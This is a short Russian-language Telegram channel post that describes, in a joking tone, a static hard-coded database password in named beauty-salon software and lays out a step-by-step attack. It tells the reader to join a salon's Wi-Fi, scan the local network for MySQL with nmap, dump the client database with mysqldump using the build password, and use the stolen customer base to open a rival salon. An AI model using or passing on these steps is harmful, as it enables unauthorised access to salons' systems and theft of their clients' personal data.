ANTICHAT Channel(@antichat). Все же помнят эту весёлую байку? 😁 Оказывается, там в салонах красоты с IT безопасностью вообще бед

Все же помнят эту весёлую байку? 😁 Оказывается, там в салонах красоты с IT безопасностью вообще беда. Есть такой специализированный софт от evolution-it.ru. И почти 5 лет назад, участник нашего форума описал уязвимость, касающуюся использования дефолтных креденшелов - Уводим клиентскую базу с «Клатч». Как оказалось, воз и ныне там, правда пароль теперь зашит в билд, но всё также статичен. Вкратце, PoC будет выглядеть так. Заваливаемся в салон красоты с девушкой. Заказываем пилинги-шпилинги и пока её прихорашивают для тебя: - Цепляемся к Wi-Fi - Находим сервер:

nmap -p 3306 192.168.1.0/24

- Забираем БД:

mysqldump -h 192.168.1.233 -u metaUser -p CURRENT_BUILD_PASSWORD klatch > dump.sql

- Открываем свой салон красоты PROFIT! 👙💋❤️